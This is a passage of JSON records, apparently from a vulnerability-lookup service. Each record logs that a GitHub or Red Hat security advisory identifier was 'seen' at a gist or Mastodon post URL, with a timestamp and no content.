"https://gist.github.com/safer-bot/c3809a62289ea4c72cad427fad95a091", "content": "", "creation_timestamp": "2025-07-16T08:01:24.000000Z"}, {"uuid": "03a25192-6fbd-49d8-a211-a88dec71ec0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/c3809a62289ea4c72cad427fad95a091", "content": "", "creation_timestamp": "2025-07-16T08:01:24.000000Z"}, {"uuid": "351386b9-c8af-43f3-a510-a2ed4b68b4c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/e1347057d92d03e6c54db5984c89a109", "content": "", "creation_timestamp": "2025-07-07T04:14:23.000000Z"}, {"uuid": "a1b43290-9613-47c9-a862-224c676b55b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/e1347057d92d03e6c54db5984c89a109", "content": "", "creation_timestamp": "2025-07-07T04:14:23.000000Z"}, {"uuid": "fae7d534-dc56-4a64-88ce-1200e6be4716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/e1347057d92d03e6c54db5984c89a109", "content": "", "creation_timestamp": "2025-07-07T04:14:23.000000Z"}, {"uuid": "43825850-6000-48a8-8da1-271fe275ded0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/e1347057d92d03e6c54db5984c89a109", "content": "", "creation_timestamp": "2025-07-07T04:14:23.000000Z"}, {"uuid": "653de2f7-e6a9-4f42-8483-9df2c7bc6e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/e1347057d92d03e6c54db5984c89a109", "content": "", "creation_timestamp": "2025-07-07T04:14:23.000000Z"}, {"uuid": "b2d2e3d6-9386-4d58-b9ad-4b1802d5e890", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/e1347057d92d03e6c54db5984c89a109", "content": "", "creation_timestamp": "2025-07-07T04:14:23.000000Z"}, {"uuid": "77dcc198-490f-4cda-a8b8-f4b3048c4da1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/e1347057d92d03e6c54db5984c89a109", "content": "", "creation_timestamp": "2025-07-07T04:14:23.000000Z"}, {"uuid": "3738991e-90ea-4420-a1ae-cce1acfb5cc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/e1347057d92d03e6c54db5984c89a109", "content": "", "creation_timestamp": "2025-07-07T04:14:23.000000Z"}, {"uuid": "598b1028-c2f7-498d-be0a-460db268b57c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/e1347057d92d03e6c54db5984c89a109", "content": "", "creation_timestamp": "2025-07-07T04:14:23.000000Z"}, {"uuid": "4a6f51f5-1c6d-4a7e-acc3-19c675064e1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/e1347057d92d03e6c54db5984c89a109", "content": "", "creation_timestamp": "2025-07-07T04:14:23.000000Z"}, {"uuid": "f66930ff-6a30-4b2d-b425-bbfb36d62ced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aa2c5e8909b5cb2e7a19342d3fac59", "content": "", "creation_timestamp": "2025-07-07T04:15:09.000000Z"}, {"uuid": "44058926-80d3-474e-b565-482c6d14f623", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aa2c5e8909b5cb2e7a19342d3fac59", "content": "", "creation_timestamp": "2025-07-07T04:15:09.000000Z"}, {"uuid": "dc1c44f1-1f0b-44d1-90b2-10d85bd75379", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aa2c5e8909b5cb2e7a19342d3fac59", "content": "", "creation_timestamp": "2025-07-07T04:15:09.000000Z"}, {"uuid": "a97e55f2-bceb-4ef1-bd08-f968d52b75c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aa2c5e8909b5cb2e7a19342d3fac59", "content": "", "creation_timestamp": "2025-07-07T04:15:09.000000Z"}, {"uuid": "04af0143-f32a-4efe-ae5e-3e21f5324fae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/c3809a62289ea4c72cad427fad95a091", "content": "", "creation_timestamp": "2025-07-16T08:01:24.000000Z"}, {"uuid": "8df67c71-4624-4923-8b23-aa210f4411cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/24d871f5d5a1f1f569b4afc0326e41b9", "content": "", "creation_timestamp": "2025-07-16T12:14:34.000000Z"}, {"uuid": "ac410b52-6805-4eff-b4fe-e77691c263b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-493p-pfq6-5258", "type": "seen", "source": "https://gist.github.com/safer-bot/309b2c3514c96b866281e3349bccea4d", "content": "", "creation_timestamp": "2025-07-16T13:21:10.000000Z"}, {"uuid": "06147077-63d0-4ea7-838f-27e84ca28540", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/309b2c3514c96b866281e3349bccea4d", "content": "", "creation_timestamp": "2025-07-16T13:21:10.000000Z"}, {"uuid": "312df497-8982-4fec-8246-03fd1519bf1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/309b2c3514c96b866281e3349bccea4d", "content": "", "creation_timestamp": "2025-07-16T13:21:10.000000Z"}, {"uuid": "e1f28488-6e4b-4359-bd47-2a3404fc96be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/309b2c3514c96b866281e3349bccea4d", "content": "", "creation_timestamp": "2025-07-16T13:21:10.000000Z"}, {"uuid": "7fd95fc6-3467-4c69-8f05-5dbf0217938a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77rm-9x9h-xj3g", "type": "seen", "source": "https://gist.github.com/safer-bot/7ddb036557afbccff4b128b5c0cf2325", "content": "", "creation_timestamp": "2025-07-16T14:01:42.000000Z"}, {"uuid": "82cdc0d9-4825-42d1-8ecf-6580de73d056", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/7ddb036557afbccff4b128b5c0cf2325", "content": "", "creation_timestamp": "2025-07-16T14:01:42.000000Z"}, {"uuid": "5e75ee89-8513-4d00-8245-b9b0bc2b972d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aa2c5e8909b5cb2e7a19342d3fac59", "content": "", "creation_timestamp": "2025-07-07T04:15:09.000000Z"}, {"uuid": "f37ff7ae-0330-45f5-a10d-cc4f39f19c02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aa2c5e8909b5cb2e7a19342d3fac59", "content": "", "creation_timestamp": "2025-07-07T04:15:09.000000Z"}, {"uuid": "cca6b2ca-be50-4f12-9373-f8646a81f311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aa2c5e8909b5cb2e7a19342d3fac59", "content": "", "creation_timestamp": "2025-07-07T04:15:09.000000Z"}, {"uuid": "f8494f17-59e1-4819-bdf4-25c1d6967420", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v528-7hrm-frqp", "type": "seen", "source": "https://gist.github.com/safer-bot/fe2fd1104f8d87898cd6cbdb2c5e4073", "content": "", "creation_timestamp": "2025-07-16T08:00:50.000000Z"}, {"uuid": "6237def2-c114-4c43-ba5f-44da3275709c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aa2c5e8909b5cb2e7a19342d3fac59", "content": "", "creation_timestamp": "2025-07-07T04:15:09.000000Z"}, {"uuid": "0b77c6d5-c3fb-4b24-934c-054e85a7311d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aa2c5e8909b5cb2e7a19342d3fac59", "content": "", "creation_timestamp": "2025-07-07T04:15:09.000000Z"}, {"uuid": "37e1805c-4a18-462e-9e7d-aa1389e8abdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/c1aa2c5e8909b5cb2e7a19342d3fac59", "content": "", "creation_timestamp": "2025-07-07T04:15:09.000000Z"}, {"uuid": "407c301e-0f83-42cb-adfc-75e799d23e7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gvpg-vgmx-xg6w", "type": "seen", "source": "https://gist.github.com/safer-bot/fe2fd1104f8d87898cd6cbdb2c5e4073", "content": "", "creation_timestamp": "2025-07-16T08:00:50.000000Z"}, {"uuid": "7b95f637-78d8-4415-a789-8deb033e134a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/fe2fd1104f8d87898cd6cbdb2c5e4073", "content": "", "creation_timestamp": "2025-07-16T08:00:50.000000Z"}, {"uuid": "138d2731-1ec5-4ebc-983a-ece8dbdbb8e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfh8-c2jp-5v3q", "type": "seen", "source": "https://gist.github.com/safer-bot/707e96a20cbce70f11457a47381ed252", "content": "", "creation_timestamp": "2025-07-16T12:17:46.000000Z"}, {"uuid": "85bcdb6c-5da5-4776-bc9e-b57f066d46dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rjr-3q55-vv33", "type": "seen", "source": "https://gist.github.com/safer-bot/707e96a20cbce70f11457a47381ed252", "content": "", "creation_timestamp": "2025-07-16T12:17:46.000000Z"}, {"uuid": "763b13f3-67d2-4edc-8904-21f943448da1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vwqq-5vrc-xw9h", "type": "seen", "source": "https://gist.github.com/safer-bot/707e96a20cbce70f11457a47381ed252", "content": "", "creation_timestamp": "2025-07-16T12:17:46.000000Z"}, {"uuid": "4a6591e6-6fd9-4687-bcdc-2dc98fd0b921", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/7ddb036557afbccff4b128b5c0cf2325", "content": "", "creation_timestamp": "2025-07-16T14:01:42.000000Z"}, {"uuid": "5a9fccd1-9d91-412a-b743-e873187e2ef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/9de2632124a34f30998e12e64df32f48", "content": "", "creation_timestamp": "2025-07-16T14:35:21.000000Z"}, {"uuid": "d43b7405-1b7e-4dfe-9fed-7351c19b8a19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4q3-7g4q-x89m", "type": "seen", "source": "https://gist.github.com/safer-bot/ed4bf4fbd35fbbbe3c137b8b518ddb07", "content": "", "creation_timestamp": "2025-07-16T14:38:12.000000Z"}, {"uuid": "572a1a10-2229-472b-9048-536f913b660a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-564r-hj7v-mcr5", "type": "seen", "source": "https://gist.github.com/safer-bot/ed4bf4fbd35fbbbe3c137b8b518ddb07", "content": "", "creation_timestamp": "2025-07-16T14:38:12.000000Z"}, {"uuid": "6043dfc1-73f5-4c56-9bf5-1b38123635d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/8ba867f6a247f7fa05740decb00edc7e", "content": "", "creation_timestamp": "2025-07-07T04:37:27.000000Z"}, {"uuid": "f42b0ffb-7cf3-47f5-a63f-ab51fe5fe875", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/79174d0c201539d79b25fe0f667fa43e", "content": "", "creation_timestamp": "2025-07-16T03:12:23.000000Z"}, {"uuid": "e2abf9fb-7ebe-4c82-8975-0494187babd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fmj5-wv96-r2ch", "type": "seen", "source": "https://gist.github.com/safer-bot/79174d0c201539d79b25fe0f667fa43e", "content": "", "creation_timestamp": "2025-07-16T03:12:23.000000Z"}, {"uuid": "b3da5612-07eb-4ebf-86d8-0ea65ecc5dda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cm93-6m2m-cjcv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114653812055217388", "content": "", "creation_timestamp": "2025-06-09T14:12:14.057900Z"}, {"uuid": "8003b070-215e-42c1-8b6d-1d2b781b150e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/8ba867f6a247f7fa05740decb00edc7e", "content": "", "creation_timestamp": "2025-07-07T04:37:27.000000Z"}, {"uuid": "b5f2a484-be92-4178-bc32-e1246c02e00e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8qff-qr5q-5pr8", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-5183fd4b-0a6bb5e00211b07e", "content": "", "creation_timestamp": "2025-06-01T02:29:46.392597Z"}, {"uuid": "cb6904f1-f745-48e5-a12b-89fcd269692b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x8mp-chx3-6x2p", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114653812055217388", "content": "", "creation_timestamp": "2025-06-09T14:12:14.165186Z"}, {"uuid": "b36b8d6d-fb8e-4aa5-8007-046755f9185b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6r3c-xf4w-jxjm", "type": "seen", "source": "https://gist.github.com/safer-bot/d7517da551eae1157b9e505894777990", "content": "", "creation_timestamp": "2025-07-07T04:47:43.000000Z"}, {"uuid": "b521992f-f5cc-4a2f-9cae-9366ead8cb34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/d7517da551eae1157b9e505894777990", "content": "", "creation_timestamp": "2025-07-07T04:47:43.000000Z"}, {"uuid": "03187448-0664-4e3b-9f63-06d55c97e0ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wc9g-6j9w-hr95", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114423300046150064", "content": "", "creation_timestamp": "2025-04-29T21:10:02.105673Z"}, {"uuid": "9296951b-0cf7-440f-a711-c3a86f9ed85f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x3m8-f7g5-qhm7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114424232674350194", "content": "", "creation_timestamp": "2025-04-30T01:07:10.634405Z"}, {"uuid": "14b819a3-9045-4638-80e1-753bce594843", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f3pf-r3g7-g895", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114653973851780131", "content": "", "creation_timestamp": "2025-06-09T14:53:22.846653Z"}, {"uuid": "d3a4e202-be5c-4865-87b7-6f26c7c2fb89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/d7517da551eae1157b9e505894777990", "content": "", "creation_timestamp": "2025-07-07T04:47:43.000000Z"}, {"uuid": "7c7eef68-0136-4246-bbba-f89378a97c26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/d7517da551eae1157b9e505894777990", "content": "", "creation_timestamp": "2025-07-07T04:47:43.000000Z"}, {"uuid": "cc6c65ef-bd1d-407c-aa00-7fb68c6c3c84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4x5-vr54-vjrx", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114582204188066200", "content": "", "creation_timestamp": "2025-05-27T22:41:25.091419Z"}, {"uuid": "511e9b72-cd7f-461c-8032-564ea3c32b73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq5x-wgcm-3p33", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114706821031041429", "content": "", "creation_timestamp": "2025-06-18T22:53:06.717551Z"}, {"uuid": "66106d02-c582-4292-89a2-5c1ac9e80a05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vq9h-x3gr-v8rj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114706821031041429", "content": "", "creation_timestamp": "2025-06-18T22:53:06.820535Z"}, {"uuid": "f610d203-7fa9-4d1f-81c4-9ad36ba862e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wc4r-xq3c-5cf3", "type": "seen", "source": "https://gist.github.com/safer-bot/d7517da551eae1157b9e505894777990", "content": "", "creation_timestamp": "2025-07-07T04:47:43.000000Z"}, {"uuid": "d313a0e1-b5b5-41f0-b33b-5b74f327a235", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h3gc-qfqq-6h8f", "type": "seen", "source": "https://gist.github.com/safer-bot/d7517da551eae1157b9e505894777990", "content": "", "creation_timestamp": "2025-07-07T04:47:43.000000Z"}, {"uuid": "f63cc7b4-ab52-4aab-a4c3-72bdaa83417f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2018:1453", "type": "seen", "source": "https://gist.github.com/dmi3mis/067762908f910f7b30fb0d7c0b2c60e3", "content": "", "creation_timestamp": "2025-07-11T13:46:40.000000Z"}, {"uuid": "a7989b05-1b26-431f-882a-b8f897b50e85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f6r4-jrvc-cfmr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114627032781451562", "content": "", "creation_timestamp": "2025-06-04T20:41:54.808251Z"}, {"uuid": "3db60e37-b3e7-4199-a33f-0beca1dbc56b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77h8-5j3h-jcjf", "type": "seen", "source": "https://gist.github.com/safer-bot/c4e6923a4745fedbec7f711b73b766a8", "content": "", "creation_timestamp": "2025-07-07T04:47:30.000000Z"}, {"uuid": "ff7e85bc-333e-464a-9b2f-3ff70f0cd3fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcrp-x7w3-ffmg", "type": "seen", "source": "https://gist.github.com/safer-bot/c4e6923a4745fedbec7f711b73b766a8", "content": "", "creation_timestamp": "2025-07-07T04:47:30.000000Z"}, {"uuid": "11801195-3d1a-4ef3-8a45-2d29d40aa517", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vpmc-3fv2-jmgp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114627032781451562", "content": "", "creation_timestamp": "2025-06-04T20:41:54.914493Z"}, {"uuid": "bb1dd990-b705-4adb-a8ae-c9cbf18174e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c25-cxcc-pmc4", "type": "seen", "source": "https://gist.github.com/safer-bot/c4e6923a4745fedbec7f711b73b766a8", "content": "", "creation_timestamp": "2025-07-07T04:47:30.000000Z"}, {"uuid": "cc4e29f7-ff6c-4bf0-9c48-4b489714b943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cfh5-3ghh-wfjx", "type": "seen", "source": "https://gist.github.com/safer-bot/79174d0c201539d79b25fe0f667fa43e", "content": "", "creation_timestamp": "2025-07-16T03:12:23.000000Z"}, {"uuid": "76c3970b-f063-40d5-9fc6-73c26a323121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/79174d0c201539d79b25fe0f667fa43e", "content": "", "creation_timestamp": "2025-07-16T03:12:23.000000Z"}, {"uuid": "39e83d5f-b615-48ef-88b9-3b43792b7a91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2x83-r56g-cv47", "type": "seen", "source": "https://gist.github.com/safer-bot/79174d0c201539d79b25fe0f667fa43e", "content": "", "creation_timestamp": "2025-07-16T03:12:23.000000Z"}, {"uuid": "1c1144c3-08cc-4f41-9b90-598b86f57082", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/ea116f5a6c0fdd46a9183269ae2c32dc", "content": "", "creation_timestamp": "2025-07-16T08:18:18.000000Z"}, {"uuid": "523f10a7-eb3e-4bcc-b8de-b3b32f8ca684", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc2q-x9mf-w3vf", "type": "seen", "source": "https://gist.github.com/safer-bot/ea116f5a6c0fdd46a9183269ae2c32dc", "content": "", "creation_timestamp": "2025-07-16T08:18:18.000000Z"}, {"uuid": "394a3e14-ec28-4ead-a5a1-ee8005311ca6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/e07299b156b0622cfe6705b4fd5b84a1", "content": "", "creation_timestamp": "2025-07-16T12:35:26.000000Z"}, {"uuid": "082018f1-ffd3-44b3-b827-cebf3460bde2", "vulnerability_lookup_origin": 